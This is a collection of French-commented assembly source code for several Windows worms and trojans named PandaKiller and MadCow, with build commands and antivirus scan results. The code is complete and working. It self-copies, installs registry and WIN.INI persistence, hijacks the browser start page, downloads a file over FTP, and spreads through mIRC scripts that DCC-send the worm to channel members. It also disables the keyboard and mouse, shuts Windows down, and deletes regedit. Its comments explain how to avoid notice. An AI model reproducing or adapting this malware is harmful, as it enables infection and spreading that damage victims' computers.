DESCRIPTION: Dans C:\PandaKiller, il cr‚e le fichier "EMail.txt" o— il ‚crit une adresse EMail o— peut nous contacter ainsi qu'un copyright. Il affiche un message et change les bouttons de la souris si on clique sur r‚‚ssayer et modifie ‚galement le nom d'enregistrement par PandaKiller

POUR COMPILER: tasm32 /M /ML PandaKiller.asm tlink32 -Tpe -x -aa PandaKiller.obj,,,import32 Lien : www.coderz.net/matrix www.matrixvx.org www.coderz.net

$ .386p locals jumps .model flat extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn .data moi targ1 targ10 fh octets l p CLE DONNEE NOM rep1 rep2 copie1 copie2 copie3 fichier TITRE TEXTE CreateDirectoryA:PROC GetWindowsDirectoryA:PROC GetSystemDirectoryA:PROC GetModuleHandleA:PROC GetModuleFileNameA:PROC CopyFileA:PROC CreateFileA:PROC WriteFile:PROC CloseHandle:PROC RegCreateKeyExA:PROC RegSetValueExA:PROC RegCloseKey:PROC lstrcat:PROC MessageBoxA:PROC SwapMouseButton:PROC ExitProcess:PROC dd dd dd dd dd dd dd db db db db db db db db db 260 dup (0) 260 dup (0) 260 dup (0) 0 0 0 0 "\Software\Microsoft\Windows\CurrentVersion",00h "PandaKiller",00h "RegisteredOwner",00h "C:\PandaKiller",00h "\Panda",00h "\PandaKiller.exe",00h "\Monopoly.exe",00h "\Panda\Stages.exe",00h "\PandaKiller\EMail.txt",00h

db "Par PandaKiller le 12/10/00",00h db "****************************",10,13 db "Ce fichier n'est pas valide!",10,13

db "****************************",00h TXT db "[PandaKiller]",0dh,0ah db "Pour tout contact : Panda34@caramail.com",0dh,0ah db "VBS/LoveLetter.A",0dh,0ah db "VBS/IE55",0dh,0ah db "W32.Happy99",0dh,0ah db "I-Worm/Kak.A",0dh,0ah db "W32.PandaKiller.A par PandaKiller (c)2000",00h equ $-TXT

taille .code

DEBUT: CREER_REPERTOIRE: push 00000000h push offset rep1 call CreateDirectoryA push 260 push offset targ1 call GetWindowsDirectoryA push offset rep2 push offset targ1 call lstrcat push offset targ1 call CreateDirectoryA AUTO_COPIE: push call push push push call push push call push push call push push push call push push call push push call push push push call push push call push push call push push push call

;C:\Pandakiller

;%windir%\Panda

00000000h GetModuleHandleA 260 offset moi eax GetModuleFileNameA 260 offset targ1 GetWindowsDirectoryA offset copie1 offset targ1 lstrcat 00000000h offset targ1 offset moi CopyFileA 260 offset targ1 GetSystemDirectoryA offset copie2 offset targ1 lstrcat 00000000h offset targ1 offset moi CopyFileA 260 offset targ10 GetWindowsDirectoryA offset copie3 offset targ10 lstrcat 00000000h offset targ10 offset targ1 CopyFileA

;%windir%\PandaKiller.exe

;%system%\Monopoly.exe

;%windir%\Panda\Stages.exe

FICHIER_TEXTE: push 00000000h push 00000080h push 00000002h push 00000000h push 00000001h push 40000000h push offset fichier call CreateFileA mov [fh],eax

push push push push push call push call REGISTRE: push push push push push push push push call push push push push push push call push call MESSAGE: push push push push call cmp jne

00h offset octets taille offset TXT [fh] WriteFile [fh] CloseHandle

offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE 80000002h RegCreateKeyExA 05h offset DONNEE 01h 0 offset NOM p RegSetValueExA 0 RegCloseKey

;HKEY_LOCAL_MACHINE ;PandaKiller ;DANS RegisteredOwner ;CREE UN REGISTRE ;FERME LA BASE DE REGISTRE

35h offset TITRE offset TEXTE 00h MessageBoxA eax,4 FIN

SOURIS: push 01h call SwapMouseButton jmp MESSAGE FIN: push 0 call ExitProcess end DEBUT

File W32PKa.exe received on 05.16.2009 10:40:20 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result W32/Heuristic-131!Eldorado W32/Heuristic-131!Eldorado Suspicious:W32/Malware!Gemini Heur.Worm.Generic probably unknown NewHeur_PE BehavesLike.Win32.Malware (v) W95.Pet_Tick.gen -

Additional information File size: 8192 bytes MD5...: 711f77c3a07ea085bee6c1bfa884f012 SHA1..: 3cd6512c587c3b0292264177f3d538aa6e9c6965

comment $ W32.PandaKiller.B par PandaKiller le 14 octobre 2000 S'AUTO-COPIE DANS DESCRIPTION: Ce programme modifie le nom d'enregistrement en PandaKiller. Il se copie dans %windir% (Dossier WINDOWS) et modifie la page de d‚marrage d'Internet. Il cr‚e ensuite trois fichiers : - FTP.DRV : ce fichier va se connecter par FTP et t‚l‚charger un programme qui est KILL_CIH.EXE (un programme contre CIH) - FTP.BAT : il va ‚x‚cuter FTP.DRV - MIRC.EKP : un script pour mIRC qui permet une autoprobagation du fichier. A la connection, il active FTP.BAT et cope WINEXEC.EXE en PICTURE.EXE. Quand quelqu'un arrive, il lui envoie PICTURE.EXE *worm* il envoie ‚galement PICTURE.EXE *KKK* : d‚connecte *White Power* : ‚teint le programme *hitler* : efface Regedit.exe POUR COMPILER: tasm32 /M /ML PandaKiller2.asm tlink32 -Tpe -x -aa PandaKiller2.obj,,,import32 Lien : $ .386p locals jumps .model flat extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn RegCreateKeyExA:PROC RegSetValueExA:PROC RegCloseKey:PROC GetWindowsDirectoryA:PROC GetModuleHandleA:PROC GetModuleFileNameA:PROC CopyFileA:PROC lstrcat:PROC CreateFileA:PROC WriteFile:PROC CloseHandle:PROC WinExec:PROC CreateDirectoryA:PROC ExitProcess:PROC www.coderz.net/matrix www.matrixvx.org www.coderz.net : - %windir%\WinExec.exe

.data moi targ1 fh octets l p CLE DONNEE NOM CLE2 DONNEE2 NOM2 CLE3 DONNEE3 NOM3 copie1 dossier bat drv ini script1 script2

dd dd dd dd dd dd db db db db db db db db db db db db db db db db

260 dup (0) 260 dup (0) 0 0 0 0 "\Software\Microsoft\Windows\CurrentVersion",00h "PandaKiller",00h "RegisteredOwner",00h "\Software\Microsoft\Internet Explorer\Main",00h "http://kadosh.multimania.com",00h "Start Page",00h "\Software\Microsoft\Windows\CurrentVersion\Run",00h "C:\Win\kill_cih.exe",00h "killcih",00h "\WinExec.exe",00h "C:\Win",00h "C:\Win\ftp.bat",00h "C:\Win\ftp.drv",00h "C:\Win\mirc.ekp",00h "C:\mirc\script.ini",00h "C:\mirc32\script.ini",00h

script3 db "C:\program files\mirc\script.ini",00h script4 db "C:\program files\mirc32\script.ini",00h

batd

db "@echo off",0dh,0ah db "start ftp -i -v -s:C:\Win\ftp.drv",00h batsize equ $-batd drvd db "open",0dh,0ah db "members.aol.com",0dh,0ah db "pentasm99",0dh,0ah db "cd Panda",0dh,0ah db "binary",0dh,0ah db "lcd C:\Win",0dh,0ah db "get kill_cih.exe",0dh,0ah db "bye",0dh,0ah db "exit",0dh,0ah drvsize equ $-drvd inid db "[SCRIPT]",0dh,0ah db "n1=on 1:start:{",0dh,0ah db "n2=.remote on",0dh,0ah db "n3=.ctcps on",0dh,0ah db "n4=.events on",0dh,0ah db "n5=}",0dh,0ah db "n6=on 1:connect:{",0dh,0ah db "n7= /.copy -0 C:\Windows\WinExec.exe C:\Picture.exe",0dh,0ah db "n8= /.run -n C:\command.com start C:\Win\ftp.bat",0dh,0ah db "n9=on 1:join:#:{",0dh,0ah db "n10=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah db "n11=}",0dh,0ah db "n12=on 1:text:*worm*:{",0dh,0ah db "n13=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah db "n14=}",0dh,0ah db "n15=on 1:text:*KKK*:/disconnect",0dh,0ah db "n16=on 1:text:*white power*:/exit",0dh,0ah db "n17=on 1:text:*hitler*:/remove C:\Windows\regedit.exe",0dh,0ah inisize equ $-inid .code REGISTRE: push push push push push push push push push call push push push push push push call push call AUTO_COPIE: push call push push push call push push call push push call push push push

offset l offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE 80000002h RegCreateKeyExA 05h offset DONNEE 01h 0 offset NOM p RegSetValueExA 0 RegCloseKey 00000000h GetModuleHandleA 260 offset moi eax GetModuleFileNameA 260 offset targ1 GetWindowsDirectoryA offset copie1 offset targ1 lstrcat 00000000h offset targ1 offset moi

;HKEY_LOCAL_MACHINE ;PandaKiller ;DANS RegisteredOwner ;CREE UNE VALEUR ;FERME LA BASE DE REGISTRE

call CopyFileA CREER_DOSSIER: push 00000000h push offset dossier call CreateDirectoryA REGISTRE2: push push push push push push push push push call push push push push push push call push call push push push push push push push push push call push push push push push push call push call FICHIER: push push push push push push push call mov push push push push push call push call push push push push push push push call mov push push 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset bat CreateFileA [fh],eax 00h offset octets batsize offset batd [fh] WriteFile [fh] CloseHandle 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset drv CreateFileA [fh],eax 00h offset octets offset l offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE2 80000001h RegCreateKeyExA 05h offset DONNEE2 01h 0 offset NOM2 p RegSetValueExA 0 RegCloseKey offset l offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE3 80000002h RegCreateKeyExA 05h offset DONNEE3 01h 0 offset NOM3 p RegSetValueExA 0 RegCloseKey

;%windir%\WinExec.exe

;C:\Win

;HKEY_CURRENT_USER ;kadosh.multimania.com ;Start Page ;CREE UNE VALEUR ;FERME LA BASE DE REGISTRE

;HKEY_LOCAL_MACHINE ;C:\nobo.exe ;NOBO ;CREE UNE VALEUR ;FERME LA BASE DE REGISTRE

push push push call push call push push push push push push push call mov push push push push push call push call COPIE_MIRC: push push push call push push push call push push push call push push push call

drvsize offset drvd [fh] WriteFile [fh] CloseHandle 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset ini CreateFileA [fh],eax 00h offset octets inisize offset inid [fh] WriteFile [fh] CloseHandle 00000000h offset script1 offset ini CopyFileA 00000000h offset script2 offset ini CopyFileA 00000000h offset script3 offset ini CopyFileA 00000000h offset script4 offset ini CopyFileA

WinExecBat: push 1 push offset bat call WinExec FIN: push 0 call ExitProcess

end REGISTRE

File W32PKb.exe received on 05.16.2009 10:41:58 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result HEUR/Malware Generic.Malware.SIsp!.664610C1 Trojan.MulDrop.origin W32/P2PWorm Generic.Malware.SIsp!.664610C1 Heur.StartPage New Malware.b New Malware.b Heuristic.Malware probably unknown NewHeur_PE W32/P2PWorm Suspicious file IRC.Sensi.B BehavesLike.Win32.Malware (v) W95.Pet_Tick.gen IRC.Sensi.B

Additional information File size: 8192 bytes MD5...: 58c6c31028ac1b84cc73eb13300f21da SHA1..: a73cf795bc76385b71158a64cc770a813b399b74

comment $ *** * * * * * * * * ** * * * * **** * * * * * * ** * ** * * ** * ** * * *** * * * * * * * * *** ** * * * * **** * * * * * * * * ** ** * * * * * * * * * * * * * * * **** * * * * * **** **** * ** * * **** *** * * * * *** * * * *

W32.PandaKiller.C par PandaKiller le 17 octobre 2000 S'AUTO-COPIE DANS : - %windir%\WinExec.exe

DESCRIPTION : 5/12 : Nom d'enregistrement : PandaKiller 2001 : D‚sactive clavier et souris POUR COMPILER: tasm32 /M /ML PandaKiller3.asm tlink32 -Tpe -x -aa PandaKiller3.obj,,,import32 $ jumps locals .386 .model flat extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn extrn GetModuleHandleA:PROC GetModuleFileNameA:PROC GetWindowsDirectoryA:PROC CopyFileA:PROC lstrcat:PROC RegCreateKeyExA:PROC RegSetValueExA:PROC RegCloseKey:PROC GetSystemTime:PROC MessageBoxA:PROC ExitProcess:PROC dd dd db dd dd db db db db db db db db db db db db 260 dup (0) 260 dup (0) "\WinExec.exe",00h 0 0 "\Software\Microsoft\Windows\CurrentVersion",00h "PandaKiller",00h "RegisteredOwner",00h "\Software\Microsoft\Windows\CurrentVersion\Run",00h "%windir%\WinExec.exe",00h "WinExec",00h "rundll32 mouse,disable",00h "Stop1",00h "rundll32 keyboard,disable",00h "Stop2",00h "T.PK.3",00h "VOUS SOUHAITE UNE BONNE ANNEE !",00h

.data moi targ1 copie l p CLE DONNEE NOM CLE2 DONNEE2 NOM2 DONNEE3 NOM3 DONNEE4 NOM4 TITRE TEXTE

SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wsecond WORD ? wMilliseconds WORD ? SYSTIME ends SystemTime SYSTIME <> .code DEBUT: AUTO_COPIE: push 00000000h call GetModuleHandleA push 260

push push call push push call push push call push push push call push push push push push push push push push call push push push push push push call push call HEURE: push call cmp jne cmp jne

offset moi eax GetModuleFileNameA 260 offset targ1 GetWindowsDirectoryA offset copie offset targ1 lstrcat 00000000h offset targ1 offset moi CopyFileA offset l offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE2 80000002h RegCreateKeyExA 05h offset DONNEE2 01h 0 offset NOM2 p RegSetValueExA 0 RegCloseKey offset SystemTime GetSystemTime [SystemTime.wMonth],0Ch HEURE2 [SystemTime.wDay],05h HEURE2 offset l offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE 80000002h RegCreateKeyExA 05h offset DONNEE 01h 0 offset NOM p RegSetValueExA 0 RegCloseKey

;%windir%\WinExec.exe

;HKEY_LOCAL_MACHINE ;%windir%\WinExec.exe

;CREE UNE VALEUR ;FERME LA BASE DE REGISTRE

REGISTRE: push push push push push push push push push call push push push push push push call push call

;HKEY_LOCAL_MACHINE ;PandaKiller ;DANS RegisteredOwner ;CREE UNE VALEUR ;FERME LA BASE DE REGISTRE

HEURE2: push offset SystemTime call GetSystemTime cmp [SystemTime.wYear],7D1h jne FIN REGISTRE2: push push push push push push push push push call offset l offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE2 80000002h RegCreateKeyExA

;HKEY_LOCAL_MACHINE

push push push push push push call push push push push push push push push push call push push push push push push call push call MESSAGE:push push push push call FIN: push call end DEBUT

05h offset DONNEE3 01h 0 offset NOM3 p RegSetValueExA offset l offset p 0 1F0000h + 1 + 2h 0 0 0 offset CLE2 80000002h RegCreateKeyExA 05h offset DONNEE4 01h 0 offset NOM4 p RegSetValueExA 0 RegCloseKey 40h offset TITRE offset TEXTE 0 MessageBoxA 0 ExitProcess

;mouse,disable

;CREE UNE VALEUR

;HKEY_LOCAL_MACHINE ;keyboard,disable

;CREE UNE VALEUR

File W32PKc.exe received on 05.16.2009 10:42:04 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result BAT/Generic Trojan.DownLoader.origin Suspicious:W32/Malware!Gemini probably unknown NewHeur_PE Suspicious file BehavesLike.Win32.Malware (v) -

Additional information File size: 8192 bytes MD5...: a133a8af3b031045bd0ae4c7d9fa4210 SHA1..: d3481290f42e9f1485d7d9cdc5184159e5272297

comment $ *** * * * * * * * * ** * * * * **** * * * * * * ** * ** * * ** * ** * * *** * * * * * * * * *** ** * * * * **** * * * * * * * * ** ** * * * * * * * * * * * * * * * **** * * * * * **** **** * ** * * **** *** * * * * *** * * * *

W95/98.PandaKiller par PandaKiller le 1er novembre 2000 POUR COMPILER: tasm32 /M /ML ?????.asm tlink32 -Tpe -x -aa ?????.obj,,,import32 $ .386 jumps locals .model flat, stdcall ;KERNEL32.dll extrn lstrcat:PROC extrn WritePrivateProfileStringA:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn CreateFileA:PROC extrn DeleteFileA:PROC extrn ExitProcess:PROC extrn CloseHandle:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetWindowsDirectoryA:PROC extrn Sleep:PROC extrn WinExec:PROC extrn WriteFile:PROC extrn GetSystemTime:PROC ;USER32.dll extrn MessageBoxA:PROC extrn SwapMouseButton:PROC extrn ExitWindowsEx:PROC extrn GetVersionExA:PROC ;ADVAPI32.dll extrn RegCreateKeyExA:PROC extrn RegCloseKey:PROC .data szOrig db 260 dup (0) szCopie db 260 dup (0) szWsk1 db 260 dup (0) szWsk2 db 260 dup (0) szWin db 260 dup (0) szWin2 db 260 dup (0) fh dd 0 octets dd 0 regDisp dd 0 regResu dd 0 Copie db "\WinExec.exe",00h Wsk1 db "\WSOCK32.DLL",00h Wsk2 db "\WSOCK32.TPK",00h Wininit db "\\WININIT.INI",00h windows db "windows",00h run db "run",00h Winini db "\\WIN.INI",00h nul db "NUL",00h rename db "Rename",00h ini db "C:\script.tpk",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h script3 db "C:\program files\mirc\script.ini",00h script4 db "C:\program files\mirc32\script.ini",00h CLE db "Software\[PandaKiller]",00h TITRE db "Error Loader",00h TEXTE db "Windows NT required !",0dh,0ah db "This program will be terminated",00h

inid

db "[script]",0dh,0ah db "n0=on 1:start:{",0dh,0ah db "n1=.remote on",0dh,0ah db "n2=.ctcps on",0dh,0ah db "n3= .events on",0dh,0ah db "n4=}",0dh,0ah db "n5=on 1:join:#:{",0dh,0ah db "n6= if ( $nick == $me ) { halt } | .dcc " db "send $nick C:\Windows\WinExec.exe",0dh,0ah db "n7=}",0dh,0ah initaille equ $-inid SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wsecond WORD ? wMilliseconds WORD ? SYSTIME ends SystemTime SYSTIME <> .code DEBUT: mov call cmp jne eax, offset CLE REG [regDisp],1 FICHIER 0 GetModuleHandleA 260 offset szOrig eax GetModuleFileNameA 260 offset szCopie GetWindowsDirectoryA offset Copie offset szCopie lstrcat 0 offset szCopie offset szOrig CopyFileA 260 offset szWin2 GetWindowsDirectoryA offset Winini offset szWin2 lstrcat offset szWin2 offset szCopie offset run offset windows WritePrivateProfileStringA 260 offset szWsk1 GetSystemDirectoryA 260 offset szWsk2 GetSystemDirectoryA offset Wsk1 offset szWsk1 lstrcat offset Wsk2 offset szWsk2 lstrcat 0 offset szWsk2 offset szWsk1 CopyFileA 260 offset szWin ; ; ; ; V‚rifie si il existe une cl‚ [PandaKiller] dans HKLM\Software. Si elle n'y est pas, il installe les composants

WCOPIE: push call push push push call push push call push push call push push push call WIN_INI:push push call push push call push push push push call WSOCK32:push push call push push call push push call push push call push push push call WININIT:push push

; ; ; Le programme se copie dans le ; ; ; dossier WINDOWS de l'ordinateur ; ; et se nommera WinExec.exe ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; On met dans le fichier WIN.INI une routine pour que le programme s'active … chaque d‚marrage. Cela ‚vite d'utiliser la BASE DE REGISTRE trop voyante. Dans WIN.INI du dossier WINDOWS "nom du programme" run= [windows]

Ici, on copie le fichier du r‚pertoire SYSTEM, WSOCK32.DLL en WSOCK32.TPK dans le mˆme r‚pertoire SYSTEM

Pour que l'ordinateur puisse utiliser le nouveau fichier

call push push call push push push push call push push push push call jmp REG:

GetWindowsDirectoryA offset Wininit offset szWin lstrcat offset szWin offset szWsk1 offset nul offset rename WritePrivateProfileStringA offset szWin offset szWsk2 offset szWsk1 offset rename WritePrivateProfileStringA FICHIER ; ; ; ; ; ; ; ; ;

; ; ; ; ; ; ; ; ; ; ; ; ; ; ;

WSOCK32.TPK, on va ‚crire dans le fichier WININIT.INI dans le r‚pertoire WNDOWS. La routine est simple :

[Rename] NUL=%system%\WSOCK32.DLL

%sys%\WSOCK32.DLL=%sys%\WSOCK32.TPK

push offset regDisp push offset regResu push 0 push 0F003FH push 0 push 0 push 0 push eax push 80000002h call RegCreateKeyExA SUITE: push [regResu] call RegCloseKey ret FICHIER:push push push push push push push call mov push push push push push call push call COPIE: push push push call push push push call push push push call push push push call push push call 00000000h 00000080h 00000002h 00000000h 00000001h 40000000h offset ini CreateFileA [fh],eax 00h offset octets initaille offset inid [fh] WriteFile [fh] CloseHandle 00000000h offset script1 offset ini CopyFileA 00000000h offset script2 offset ini CopyFileA 00000000h offset script3 offset ini CopyFileA 00000000h offset script4 offset ini CopyFileA 00h offset ini DeleteFileA

default security descriptor KEY_ALL_ACCESS

adresse de la sous-CLE HKEY_LOCAL_MACHINE ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; ; Voila, un des moyens les plus pratique pour envoyer notre programme un peu partout. C'est mIRC. En utilisant un script, mIRC va automatiquement envoyer notre programme … tous ceux qui se trouve dans le CHANNEL de la victime. Pour cela, on va ‚crire le script dans le dossier C:\

Puis on va le copier dans les dossier suivant : C:\mirc

C:\mirc32

C:\program files\mirc

C:\program files\mirc32 Puis efface l'original.

ATTEND: push 60 * 1 * 1000 call Sleep SOURIS: push 01h call SwapMouseButton HEURE2: push call cmp jne offset SystemTime GetSystemTime [SystemTime.wYear],7D1h ALERT

; ; Fait une pause de 1 minute. ; ; Modifie les boutons de la souris. ; ; Regarde la date du systˆme. ; Si nous ne sommes pas en l'an 2001, ; il saute au label ALERT

ETEIND: push 01h call ExitWindowsEx ALERT: push push push push call 10h offset TITRE offset TEXTE 0 MessageBoxA

; ; Sinon ‚teind l'ordinateur. ; ; Affiche le faux message d'erreur. ; ; ; ; ; Fin du Programme

FIN:

push 0 call ExitProcess

end DEBUT

File W95PK.exe received on 05.16.2009 10:42:08 (CET) Antivirus a-squared AhnLab-V3 AntiVir Antiy-AVL Authentium Avast AVG BitDefender CAT-QuickHeal ClamAV Comodo DrWeb eSafe eTrust-Vet F-Prot F-Secure Fortinet GData Ikarus K7AntiVirus Kaspersky McAfee McAfee+Artemis McAfee-GW-Edition Microsoft NOD32 Norman nProtect Panda PCTools Prevx Rising Sophos Sunbelt Symantec TheHacker TrendMicro VBA32 ViRobot VirusBuster Version 4.0.0.101 5.0.0.2 7.9.0.168 2.0.3.1 5.1.2.4 4.8.1335.0 8.5.0.336 7.2 10.00 0.94.1 1157 5.0.0.12182 7.0.17.0 31.6.6508 4.4.4.56 8.0.14470.0 3.117.0.0 19 T3.1.1.49.0 7.10.735 7.0.0.125 5616 5616 6.7.6 1.4602 4080 6.01.05 2009.1.8.0 10.0.0.14 4.4.2.0 3.0 21.29.51.00 4.41.0 3.2.1858.2 1.4.4.12 6.3.4.1.326 8.950.0.1092 3.12.10.5 2009.5.15.1737 4.6.5.0 Last Update 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 2009.05.08 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.14 2009.05.16 2009.05.15 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.16 2009.05.15 2009.05.15 2009.05.16 2009.05.15 2009.05.15 Result HEUR/Malware IRC/Generic.dropper BehavesLike:Win32.IRC-Worm W32.Ultratt.gz BACKDOOR.Trojan W32/P2PWorm BehavesLike:Win32.IRC-Worm IRC-Worm.DOS.Generic New Malware.b New Malware.b Heuristic.Malware probably unknown NewHeur_PE W32/P2PWorm IRC.Buffy.C W95.Pet_Tick.gen Possible_Virus IRC.Buffy.C

Additional information File size: 8192 bytes MD5...: f7b2facb5e2c9e5870065004446a8867 SHA1..: 837ce36b596ffab1af92ac1c63506fa613e16e6c

comment * Pour assembler : jumps locals .386 .model flat,stdcall

///// I-Worm.MadCow par PetiK /////

25/11/2000

tasm32 /M /ML madcow.asm tlink32 -Tpe -aa -x madcow.obj,,,import32.lib *

;KERNEL32.dll extrn lstrcat:PROC extrn WritePrivateProfileStringA:PROC extrn CloseHandle:PROC extrn CopyFileA:PROC extrn CreateDirectoryA:PROC extrn CreateFileA:PROC extrn DeleteFileA:PROC extrn ExitProcess:PROC extrn GetModuleFileNameA:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetWindowsDirectoryA:PROC extrn MoveFileA:PROC extrn WinExec:PROC extrn WriteFile:PROC ;ADVAPI32.dll extrn RegSetValueExA:PROC extrn RegCreateKeyExA:PROC extrn RegCloseKey:PROC .data regDisp dd regResu dd l dd p dd fh dd octets dd szOrig db szOrig2 db szCopie db szCopi2 db szCico db szWin db Dossier db fichier db Copico db Copie db Copie2 db BATFILE db VBSFILE db Winini db run db windows db fileini db Copie3 db script1 db script2 db script3 db script4 db CLE db CLE2 db Signature 0 0 0 0 0 ? 260 dup (0) 260 dup (0) 260 dup (0) 260 dup (0) 260 dup (0) 260 dup (0) "C:\Win32",00h "C:\Win32\Salut.ico",00h "\MSLS.ICO",00h "\Wininet32.exe",00h "\MadCow.exe",00h "C:\Win32\ENVOIE.BAT",00h "C:\Win32\ENVOIE.VBS",00h "\\WIN.INI",00h "run",00h "windows",00h "C:\Win32\script.ini",00h "C:\Win32\MadCow.exe",00h "C:\mirc\script.ini",00h "C:\mirc32\script.ini",00h "C:\program files\mirc\script.ini",00h "C:\program files\mirc32\script.ini",00h "Software\[Atchoum]",00h "\exefile\DefaultIcon",00h db "IWorm.MadCow par PetiK (c)2000"

